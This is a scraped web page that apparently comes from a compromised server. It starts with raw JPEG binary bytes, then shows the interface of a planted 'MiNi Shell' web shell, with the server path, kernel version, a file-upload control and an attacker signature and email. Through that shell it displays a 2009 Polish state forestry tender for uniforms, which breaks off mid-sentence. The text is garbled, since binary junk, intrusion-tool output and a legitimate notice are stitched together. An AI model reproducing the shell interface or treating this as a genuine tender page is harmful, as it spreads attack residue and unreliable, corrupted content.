JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/71415-N-2009.html

<p class="kh_header"><b>Lubasz: Dostawa umundurowania dla Nadleśnictwa Krucz w roku 2009</b><br>
<b>Numer ogłoszenia: 71415 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Krucz , Krucz 28, 64-720 Lubasz, woj. wielkopolskie, tel. 067 2551825, faks 067 2551878.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa umundurowania dla Nadleśnictwa Krucz w roku 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest dostawa sortów mundurowych leśnika umundurowania dla Nadleśnictwa Krucz w roku 2009:


Nazwa sortymentu	
Ilość
pkt	
j.m.	
Ilość

Mundur wyjściowy  męski, damski	40	Kpl	11
Płaszcz męski, damski	45	Szt.	0
Kurtka zimowa męska, damska	40	Szt.	10
Koszula biała męska, damska
	krótki rękaw
	długi rękaw	6	Szt.	
19
15
Krawat	3	Szt.	18
Kapelusz:
	męski
	damski	9	Szt.	
7
1
Czapka mundurowa	7	Szt.	2
Szalik	2	Szt.	4
Skarpety	1	Para	58
Półbuty	10	Para	24
Rękawice męskie, damski	6	Para	7
Wizerunek orła	0	Szt.	2
Wizerunek gałązki modrzewia	0	Szt.	2
Dystynkcje	5	Para	7
Kurtka do munduru codziennego	30	Szt.	14
Bluza z polaru	17	Szt.	30
Spodnie
	wyjściowe
	moro
o	letnie
o	zimowe	15	Para	
23

26
4
Spódnica	15	Szt.	2
Marynarka męska		Szt.	0
Sweter	10	Szt.	25
Kamizelka	12	Szt.	10
Koszula khaki męska, damska
	krótki rękaw
	długi rękaw	6	Szt.	
43
22
Czapka zimowa	5	Szt.	9
Peleryna p. deszczowa	18	Szt.	2
Półbuty do munduru codziennego	10	Para	15
Oznaki identyfikacyjne	0	Para	0
Mundur terenowy letni	37	Kpl	4
Mundur terenowy zimowy	50	Kpl	4
Czapka letnia do munduru terenowego	2	Szt.	8
Czapka zimowa do munduru terenowego	5	Szt.	3
Trzewiki terenowe:
	SYMPATEX
	GORE-TEX 	
20
40	
para
para	
11
22

Dodatkowe warunki dotyczące przedmiotu zamówienia: 
a)	termin płatności: 30 dni od daty wystawienia faktury,
b)	nie przewiduje się zaliczek na poczet materiałów,
c)	forma zapłaty - jak w projekcie umowy,
d)	elementy umundurowania będą odbierane w siedzibie Wykonawcy przez przedstawicieli zamawiającego , 
e)	Wykonawca zapewni (liczoną od daty odbioru) rękojmię na dostarczone przedmioty umundurowania na  warunkach określonych w umowie,
f)	w trakcie realizacji dostawy Zamawiający zastrzega sobie prawo do pobierania jednostkowych sortów mundurowych w ilościach innych niż wymienione w popisie przedmiotu zamówienia; w związku z powyższym rozliczanie za przedmiot zamówienia obywać będzie się na podstawie cen jednostkowych przy zastrzeżeniu, że nie zostanie przekroczona umowna wartość zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-9, 19.00.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.	są uprawnieni do występowania w obrocie prawnym; 
     uprawnienia, koncesje, zezwolenia;
2.	mają doświadczenie co najmniej 1 zamówienie w realizacji zamówień jako dostawca umundurowania do jednostek organizacyjnych Lasów Państwowych o wartości co najmniej 50 000 złotych w ciągu ostatniego roku, ;
3.	dysponują potencjałem technicznym i ekonomicznym niezbędnym do wykonania
     zamówienia;
4.	dysponują pracownikami zdolnymi do wykonania zamówienia;
5.	posiadają sytuację finansową i ekonomiczną gwarantującą wykonanie zamówienia;
6.	nie podlegają wykluczeniu z art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Dz.U. z 2006 r. nr 164 poz. 1163 z późn. zm.;
7.	wykażą i udokumentują spełnianie wymogów jakościowych w zakresie świadczenia usług będących przedmiotem zamówienia, potwierdzone posiadaniem certyfikatu wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu lub ważnego 6 miesięcy od daty wystawienia upoważnienia dystrybutora do posługiwania się ww certyfikatem.

Sposób dokonywania oceny spełniania warunków:
a)  ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia
     - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach
     wymienionych w dziale VIII; z treści załączonych dokumentów musi
     wynikać jednoznacznie, iż ww warunki Wykonawca spełnił;
b)  nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem
     Wykonawcy z postępowania a oferta uznana będzie za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków określonych w dziale VII Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty i oświadczenia:
1.	oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy z dnia 29
    stycznia 2004 r. prawo zamówień publicznych Dz.U. z 2006 r. nr 164 poz. 1163 z późn.      
    zm. wg wzoru zamieszczonego w załączniku nr 2 do SIWZ;
2.	oświadczenie o niepodleganiu wykluczeniu na podstawie art. 24 pkt. 1 i 2 ustawy
    z dnia 29 stycznia 2004 r. prawo zamówień publicznych Dz.U. z 2006 r. nr 164
    poz. 1163 wg wzoru określonego w załączniku nr 3 SIWZ;
3.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru
    lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej
    niż 6 miesięcy przed upływem terminu składania ofert;
4.	zaświadczenie spełniania wymogów jakościowych w zakresie świadczenia usług będących przedmiotem zamówienia, potwierdzone posiadaniem Świadectwa zgodności ze wzorem sortów mundurowych wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu lub ważnego 6 miesięcy od daty wystawienia upoważnienia producenta dystrybutora do posługiwania się ww Świadectwem oraz wykaz wykonanych w okresie 3 lat usług na rzecz lasów państwowych.
5.	wypełniony formularz ofertowy wg wzoru zamieszczone w załączniku nr 1 do niniejszej SIWZ;
6.	Pełnomocnictwo podmiotów występujących wspólnie konsorcjum,

Zamawiający informuje, że zgodnie z art. 96 ust. 3 ustawy Prawo zamówień publicznych oferty składane w postępowaniu o zamówienie publiczne są jawne i podlegają udostępnieniu od chwili ich otwarcia, z wyjątkiem informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeśli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępniane. Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji Dz.U. z 1993 r. nr 47 poz. 211 rozumie się nieujawnione do wiadomości publicznej informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności, tzn. zastrzegł składając
ofertę, iż nie mogą być one udostępnione innym uczestnikom postępowania. Stosowne zastrzeżenie Wykonawca winien złożyć na formularzu ofertowym. W przeciwnym razie cała oferta zostanie ujawniona na życzenie każdej zainteresowanej osoby. Zamawiający zaleca, aby informacje zastrzeżone jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem tajemnica przedsiębiorstwa, lub spięte (zszyte) oddzielnie od pozostałych, jawnych elementów oferty. Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ww. ustawy skutkować będzie odrzuceniem oferty na podstawie art. 89 ust. 1 pkt 1 ustawy Prawo zamówień publicznych .Wykonawca w szczególności nie może zastrzec informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie por. art. 86 ust. 4 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pila.lasy.gov.pl/krucz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Krucz, Krucz 28, 64-720 Lubasz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 09:00, miejsce: 1.	Oferty należy składać w siedzibie  Nadleśnictwa Krucz: Krucz 28, 64-720 Lubasz.  Na wniosek Wykonawcy otrzyma On pisemne potwierdzenie złożenia oferty..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przy wyborze oferty zamawiający będzie się kierował następującym kryterium:
cena ofertowa - 100 % + koszty przewozu zamawiającego.
Koszty przewozu zamawiającego będą liczone następująco:
(odległość od siedziby zamawiającego do wykonawcy x 2 x zryczałtowane koszty użycia pojazdu służbowego o pojemności > 900 cm3 ) x 8 krotny dojazd do wykonawcy.
 Gdzie: 
 - odległość od siedziby zamawiającego do wykonawcy liczona wg mapy,

Creat By MiNi SheLL
Email: jattceo@gmail.com